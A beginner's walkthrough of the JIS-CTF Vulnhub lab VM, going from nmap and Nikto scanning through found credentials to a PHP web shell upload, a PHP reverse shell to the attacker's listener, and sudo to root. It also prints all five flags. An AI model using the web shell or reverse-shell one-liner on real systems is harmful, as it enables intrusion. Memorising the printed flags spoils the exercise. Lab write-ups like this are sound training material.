Fork me on GitHub

JIS-CTF Walkthrough

JIS-CTF
WARNING: There will be spoilers to obtaining the 5 keys on JIS-CTF VM from Vulnhub. This is your warning! If you wish to penetration test this machine, do not scroll down much further.
General disclaimer: I am by no means an expert penetration tester nor do I have a lot of experience doing penetration testing. This walkthrough is from the perspective of an amateur whom is trying to become better. The goal is for me to eventially take the OCSP. That being said, I had a bit of help from some colleagues from my company getting started but they by no means gave me the answers. I will be posting some of my hardships from a beginner perspective.

 The JIS-CTF VM download from Vulnhub can be found here: https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

The creator of this VM is Mohammad Khreesha

Here's the basic description:

Difficulty: Beginner

There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags.

Only working with VirtualBox

1. Service Enumeration

I always start off with a nmap scan of any system I am looking to attack. I usually always use same nmap command: nmap -A 192.168.1.25 -vvv -p1-65535 - let's break that down:

-A = Enable OS detection, version detection, script scanning, and traceroute
-p1-65535 = Port scan from 1 to 65335
-vvv = Extra verbose output.

Spoiler: Highlight to view

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-10 01:04 EST
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:04
Completed NSE at 01:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:04
Completed NSE at 01:04, 0.00s elapsed
Initiating ARP Ping Scan at 01:04
Scanning 192.168.1.25 [1 port]
Completed ARP Ping Scan at 01:04, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:04
Completed Parallel DNS resolution of 1 host. at 01:04, 0.03s elapsed
Initiating Connect Scan at 01:04
Scanning 192.168.1.25 [65535 ports]
Discovered open port 22/tcp on 192.168.1.25
Discovered open port 80/tcp on 192.168.1.25
Completed Connect Scan at 01:04, 3.39s elapsed (65535 total ports)
Initiating Service scan at 01:04
Scanning 2 services on 192.168.1.25
Completed Service scan at 01:05, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.25
NSE: Script scanning 192.168.1.25.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:05
Completed NSE at 01:05, 0.23s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:05
Completed NSE at 01:05, 0.00s elapsed
Nmap scan report for 192.168.1.25
Host is up, received arp-response (0.00024s latency).
Scanned at 2018-03-10 01:04:51 EST for 11s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMhxMikXNcV5fSVQOdDJd8pD0wcwgxing+sxhHlFLey4pROQlu4gq+rDlBlPUZm
|8i1DvKcbLU0B5TdLoLga2xEjh8039aQwDapzyUxQgGj62JGOtkIBG+ABZ8W8al8vMyznDrzCptsFP5wO90Bn/7TFB98ROpUs
|w/0NLrb|gEY25+xSreAlbuXZoDWmAo9q04AYkv70E+4uSumBrV+lULo/l6DPh|YcXZWj0E101b8P+Ta/Iyb2dEnVvRNz3NAdrg
|EoTfWUbi1mEnKH4pbf8SYGtwjOGtghZpuf8ouddwSJkK3uDp1EyK9kx2IROW5BzU7GoCvbhuEzk5Vbp1A55yGXn
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAwInAlaJjHZDOub+Y9MsG+uzczbUvQrH
|UfclhDDU3kw4nYQaK+T1UgKVEV4KetTUBrhlz5+GCAyLZluCxp0sKU=
|   256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAEcE9PBIBqFBfhTWXC4t9TDCicDwhJH3WahE9YoYPm5
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 8 disallowed entries
| / /backup /admin /admin_area /r00t /uploads
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=3/10%OT=22%CT=1%CU=40804%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5AA3758F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Uptime guess: 198.841 days (since Wed Aug 23 05:54:10 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.1.25

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:05
Completed NSE at 01:05, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:05
Completed NSE at 01:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds
           Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)

Based on the above nmap scan output, there are 2 services running.

The first service is SSH as seen by the output:

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

I'm absolutely not an expert when it comes to attacking through SSH and fairly certain this isn't the proper attack vector. So I ended up ignoring the SSH scan information.

The other service we have running on this machine is a web service using Apache per the output:

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))

2. Web (Server/Service)

After nmap, I decided to bust out a tool called Nikto. It's pretty useful for gathering information about websites. The command and it's output are below:

Spoiler: Highlight to view

nikto -host 192.168.1.25
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.25
+ Target Hostname:    192.168.1.25
+ Target Port:        80
+ Start Time:         2018-03-10 01:17:57 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0xa0 0x54d829805215a
+ Entry '/admin_area/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/uploaded_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 8 entries which should be manually viewed.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7544 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2018-03-10 01:18:10 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So looking at the results of our Nikto scan we found the following:

  • robots.txt
  • admin_area directory
  • uploaded_files directory
  • flag directory
  • login page

While Nikto was running, I had another tool that I recently learned about, Dirbuster running simultaneously:

Spoiler: Highlight to view

dirbuster

Dirbuster confirms some of the findings we had from Nikto, but we found a number of other files based on the configurations we provided. We can see things like the Apache server status web page, a hint text file, flag text file, and much more.

I started with the robots.txt to see what might be in there and to confirm some of the Dirbuster/Nikto findings:

Spoiler: Highlight to view


User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag



Using some of the results returned from Dirbuster, I decided to try the flag.txt file but I received an accessed denied. The next thing I try to view is the hint.txt file where I am presented with key #3 and information about a linux user on the system called technawi and that technawi's  credentials are hidden in a text file somewhere on the server:

Spoiler: Highlight to view

3rd key

The 3rd key can be found under the key/flag section.

I then decided to start trying the disallowed directories in the robots.txt. Most of them appeared to not have anything interesting.

I enter the admin_area directory and all I see is this basic web page more or less saying go away nothing to see here. I tend to view the source code of any web page I visit where I ended up finding key #2, along with a username and password to what is hopefully the login credentials I need. I've included the source code but redacted the 2nd key. This can be found later in the walkthrough as well.

Spoiler: Highlight to view
<html>
<head>
<title>
Fake admin area :)
</title>
<body>
<center><h1>The admin area not work :) </h1></center>
<!--	username : admin
	password : 3v1l_H@ck3r
	The 2nd flag is : REDACTED
-->
</body>
</html>

Of course I save these credentials for later to see if they are indeed what I need. I proceed to work my way through the disallowed folders in robots.txt and I come upon the flag directory where I am presented with the 1st key. The key will be listed later in this walkthrough as well.

At this point I have keys #1 through #3, a set of credentials, a username to view a file, and the credentials for this username are hidden somewhere on the filesystem.

I visit the login page and enter the credentials I found for the 2nd key under the admin area where I am presented with a file upload web page: 

File upload

3. Establish a foothold

At this point I create a basic PHP shell command page and upload it. The code used for the PHP basic "shell.php" is as follows:

Spoiler: Highlight to view
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Once I uploaded the shell, I checked the /uploaded_files/ for my shell.php file and sure enough it was there.

After uploading the shell script, I started to run netcat on my system on port 4444 using the command nc -lvp 4444.

I tried using my shell.php to call a python command that would give me a reverse shell but it didn't quite work out. My next attempt was to use the native php on the system to try and create a shell. For this I used a URL encoder at http://www.albionresearch.com/misc/urlencode.php and I gave it the following plaintext: php -r '$sock=fsockopen("Kali Box IP Address",4444);exec("/bin/bash -i <&3 >&3 2>&3");'

The encoded output is as follows: php%20-r%20'%24sock%3Dfsockopen(%22192.168.1.29%22%2C4444)%3Bexec(%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B'

From there, I append the encoded output onto my basic shell command to http://Target_Box/uploaded_files/shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.1.29%22%2C4444)%3Bexec(%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

Basically at this point I have a basic reverse shell. I would prefer a more interactive shell so I use the following command to do so: python3 -c 'import pty; pty.spawn("/bin/bash")' 

I used python3 since the system actually did not have Python 2 installed.

We know about this "technawi" user. So I check out to see if technawi's home directory is accessible. Luckily enough it was.

technawi home dir

"technawi" has a few global readable files being:

  • .bash_logout
  • .bashrc
  • .profile
  • .sudo_as_admin_successful
  • 1 (number one)

None of the files really seemed interesting once I looked into reading them. The "1" file was the Apache configurations which didn't really give me anything I didn't already know. The sudo_as_admin_successful makes me think that techawi can use sudo commands but I can look into that later once I have the credentials.

I remember back when I discovered key #3 that technawi's password is hidden somewhere on the file system.

Rabbit hole #1: I run some commands to find any and all hidden files on the file system using find ./ -name ".*" -print for technawi's home directory for grins and gigles. I shouldn't expect to see anything new from the above screenshot. So I widen my search with find / -name ".*" -print 2>/dev/null to the entire file system. I don't want to see any errors, so I send them to the garbage collector. Nothing of particular interest showed up.

So to get back on track: I try just search the entire file system for text files using find / | grep txt - a bunch of things came up and this probably wasn't the expected way to find what I needed but it worked out. I found a text file /etc/mysql/conf.d/credentials.txt.

I have some experience when it comes to configuring MySQL services and this isn't a file you'd typically see ever. I output the contents to get key #4 along with technawi's password:

Spoiler: Highlight to view

 

The 4th flag is : REDACTED

username : technawi
password : 3vilH@ksor
www-data@Jordaninfosec-CTF01:/var/www/html/admin_area$ 

Key #4 will be listed at the end with the rest.

I now have technawi's password and login as that user:

technawi login

At this point I remember there was a text file called "flag.txt" in the root directory of the website which is only viewable by technawi. Cat'ing the file I got the 5th key:

Spoiler: Highlight to view

technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt
cat flag.txt
The 5th flag is : REDACTED

Good job :)

You find 5 flags and got their points and finish the first scenario....

4. Privilege Escalation

I have officially captured all the required keys for this VM based on what was said for it via vulnhub. This is definitely great and all, but as a penetration tester, you definitely want to own the box and get root.

I recall that technawi has a file in it's home directory .sudo_as_admin_successful so I give the command sudo bash a shot to see if I get a root shell:

root shell JIS-CTF

BAM. I have root.

That's it for this VM.

5. Flags/Keys

Flag #1: Found by performing a web scan like Dirbuster in the http://target_ip/flag/index.html page

Here's the actual flag:

Spoiler: Highlight to view
{8734509128730458630012095}

Flag #2: Found by performing a web scan like Dirbuster to get the http://target_ip/admin_area/ directory. From here you view the source code

Here's the actual flag:

Spoiler: Highlight to view
{7412574125871236547895214}

Flag #3: Found in the hint.txt file in the root directory. This was found using Dirbuster.

Here's the actual flag:

Spoiler: Highlight to view
{7645110034526579012345670}

Flag #4: Found by scanning the file system for technawi's password. Found in the file /etc/mysql/conf.d/credentials.txt

Here's the actual flag:

Spoiler: Highlight to view
{7845658974123568974185412}

Flag #5: Found in a text file called flag.txt in the root directory of the website by using Dirbuster. Inaccessible until you become technawi

Here's the actual flag:

Spoiler: Highlight to view
 {5473215946785213456975249}

There ya have it! The walkthrough of the JIS-CTF vulnhub VM. Please feel free to add any constructive feedback for any future walkthroughs I write up, tips for becoming a better pen tester, etc.